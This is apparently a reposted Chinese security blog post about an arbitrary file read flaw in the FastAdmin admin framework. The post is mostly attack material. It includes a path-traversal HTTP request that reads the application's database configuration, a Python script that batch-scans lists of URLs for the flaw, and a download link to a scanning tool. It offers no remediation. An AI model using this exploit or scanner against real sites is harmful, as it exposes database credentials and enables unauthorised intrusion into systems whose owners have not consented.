前言
FastAdmin是一款基于ThinkPHP Bootstrap开发的快速后台开发框架,FastAdmin基于Apache2.0开源协议发布,免费且不限制商业使用,目前被广泛应用于各大行业应用后台管理。
漏洞描述
FastAdmin是一个基于ThinkPHP和Bootstrap的快速开发的后台管理系统框架。FastAdmin框架存在文件读取漏洞,攻击者利用此漏洞可以获取系统敏感信息。
漏洞复现
1.发送数据包读取文件
GET /index/ajax/lang?lang=../../application/database HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
扫描工具
python3 fastadmin.py -uf 1.txt
脚本:
# -*- coding: utf-8 -*- import argparse import requests requests.packages.urllib3.disable_warnings() class CONFIG: def __init__(self): self.headers = { 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7', 'Accept-Language': 'zh-CN,zh;q=0.9,en;q=0.8,en-US;q=0.7,ja;q=0.6', "Content-Type": "application/x-www-form-urlencoded", 'Connection': 'keep-alive', 'Upgrade-Insecure-Requests': '1', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36', } self.api_path = "/index/ajax/lang?lang=../../application/database" def poc_scan(url): try: print("请求的url:", url) repose = requests.post(url + CONFIG().api_path, headers=CONFIG().headers, timeout=5, verify=False) if b"define" in repose.content: print("url:", url, "存在该漏洞") else: print("url:", url, "不存在该漏洞") except Exception as e: print("url:", url, "报错了,自行验证漏洞!") # print(e) def args_root(): try: parser = argparse.ArgumentParser(description='eeeeee input') parser.add_argument('-u', "--url", dest='url', default=False, help='指定url') parser.add_argument('-uf', "--url-file", dest='url_file', default=False, help='指定url文件') args = parser.parse_args() return args except Exception as e: print(e) if __name__ == "__main__": argss = args_root() if argss.url: poc_scan(argss.url) if argss.url_file: with open(argss.url_file, "r") as file: for i in file.read().split("\n"): poc_scan(i)
fastadmin工具:
链接:https://pan.baidu.com/s/1Zm54ZHup3tfpxOqUFUr6pw?pwd=n8pw
提取码:n8pw
原文始发于微信公众号(安全笔记):Fastadmin框架任意文件读取漏洞(附带扫描工具)
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论